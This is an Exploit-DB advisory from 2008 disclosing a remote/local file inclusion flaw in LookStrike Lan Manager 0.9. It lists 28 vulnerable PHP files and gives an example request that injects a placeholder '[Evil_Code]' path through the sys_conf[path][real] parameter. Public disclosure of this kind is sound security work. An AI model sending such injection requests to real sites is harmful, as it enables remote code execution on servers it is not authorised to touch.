LookStrike Lan Manager 0.9 - Local/Remote File Inclusion

EDB-ID:

5121


Author:

MhZ91

Type:

webapps


Platform:

PHP

Date:

2008-02-14


--==+================================================================================+==--
--==+		LookStrike Lan Manager v0.9 Remote\Local File Inclusion              +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: LookStrike Lan Manager v0.9 Remote\Local File Inclusion 
 Download: http://sourceforge.net/project/showfiles.php?group_id=152660
 Bug: Remote\Local File Inclusion
 Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically.
 Visit: http://www.inj3ct-it.org

[*]----------------------------------------------------------

LookStrike Lan Manager v0.9 present a remote\local file inclusion vulnerability in this file.. 

modules\class\Table.php
modules\class\db\db_admins.php
modules\class\db\db_alert.php
modules\class\db\db_double.php
modules\class\db\db_games.php
modules\class\db\db_matches.php
modules\class\db\db_match_teams.php
modules\class\db\db_news.php
modules\class\db\db_platform.php
modules\class\db\db_players.php
modules\class\db\db_server_group.php
modules\class\db\db_server_ip.php
modules\class\db\db_teams.php
modules\class\db\db_team_players.php
modules\class\db\db_tournaments.php
modules\class\db\db_tournament_teams.php
modules\class\db\db_trees.php
modules\class\tournament\Match.php
modules\class\tournament\MatchTeam.php
modules\class\tournament\Rule.php
modules\class\tournament\RuleBuilder.php
modules\class\tournament\RulePool.php
modules\class\tournament\RuleSingle.php
modules\class\tournament\RuleTree.php
modules\class\tournament\Tournament.php
modules\class\tournament\TournamentTeam.php
modules\class\tournament\Tree.php
modules\class\tournament\TreeSingle.php

all are exploitable by the variable "sys_conf[path][real]" for example

http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]


[*]----------------------------------------------------------

# milw0rm.com [2008-02-14]